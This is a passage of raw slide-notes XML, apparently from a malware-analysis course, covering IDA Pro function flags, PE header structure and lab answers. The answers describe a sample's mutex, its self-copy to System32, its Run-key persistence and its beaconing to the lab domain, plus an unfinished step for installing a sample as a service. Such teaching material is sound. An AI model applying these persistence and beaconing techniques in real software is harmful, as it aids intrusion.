          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Option – General – Line Prefix – No. of Opcode bytes = 6</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Option – General – Auto comments</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R - function returns to the caller</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>F - far function</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>L - library function</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>S - static function</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>B - BP based frame. IDA will automatically convert</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            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>all frame pointer [BP+xxx] operands to stack</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            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>variables.</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>T - function has type information</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>= - Frame pointer is equal to the initial stack pointer</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            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>In this case the frame pointer points to the bottom of the frame</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>M - reserved</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>S - reserved</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>I - reserved</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>C - reserved</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>D - reserved</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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>V - reserved</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896"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B849FFB1-3EBD-4D9D-A174-7B71E7EACAFF}"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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898"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899"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A11C8728-F590-405B-95DA-D44E9A2CDD2E}"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 name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901"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902"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07F73F61-5229-40F4-8762-E202D1E563CC}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904"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905"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E6BAE5EE-3072-4E49-857E-557852A13682}"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6" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907"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908"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AAC937CC-3B12-4975-A6BB-8FD6A0BD49EF}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Signature </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>is a DWORD(4 bytes) containing the value 50h, 45h, 00h, 00h (“PE” followed by two terminating zeroes).</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>FileHeader </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(IMAGE_FILE_HEADER) is the next 20 bytes of the PE file and contains info about the physical layout &amp; properties of the file e.g. number of sections.</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>OptionalHeader </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(IMAGE_OPTIONAL_HEADERS) is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file with fields like AddressOfEntryPoint, ImageBase, FileAlignment, SectionAlignment etc. The last 128 bytes contains the Data Directory which is an array of 16 IMAGE_DATA_DIRECTORY structures.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767"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E7CA3679-9317-4A3A-BFCE-87E737E79DC6}"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 name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Header:</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Machine: i386,486,586 (0x14c)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770"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F96F4FC4-5296-456B-A193-D35240400AA5}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772"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773"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8AE0792B-7818-458E-AC80-C3728F26ABDC}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775"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776"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D3368BFC-8B1C-4381-865B-C24589431539}"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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778"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779"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633AA930-7E47-42E9-8FB8-15FBECD61C95}"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0" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781"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782"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AF225CC4-79A2-4B1D-B123-38DFFA460881}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754"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755"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31686F03-1DCC-4C63-BB49-F30D8C322CDB}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>83c21d49acae2dea242d1b687cf3061b</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785"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61E1C077-4E30-4C06-AFAC-96F089FAF193}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787"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788"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26138E0A-D715-481A-A180-73905E9E882D}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790"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791"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285D557E-246F-406A-8026-F46D1AD9A148}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793"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794"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080ADD36-43CE-4768-A94E-4AA6120C91AD}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="796"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797"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FECF14FE-0DFD-417A-A5A2-DAF9B34991C7}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="799"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800"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9FDC7129-5BC0-4644-86CA-45979D8A1530}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802"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803"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6B6CF00C-6975-46FE-B674-5BCAF7DC7E7E}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805"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806"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7E5B239C-D57D-441A-951C-9DDBC7123C30}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="808" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1. The malware appears to be packed. The only import is ExitProcess,</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although the strings appear to be mostly clear and not obfuscated.</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2. The malware creates a mutex named WinVMX32, copies itself into </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Windows\ System32\vmx32to64.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>. and installs itself to run on system</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startup by creating the registry key HKLM\SOFTWARE\Microsoft\Windows\</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CurrentVersion\Run\VideoDriver set to the copy location.</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3. The malware beacons a consistently sized 256-byte packet containing</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seemingly random data after resolving </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>www.practicalmalwareanalysis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="809"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62219FAE-55F2-452F-A8DA-E2A753C2442F}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To install the malware as a service, run the malware’s exported installA</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function via </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
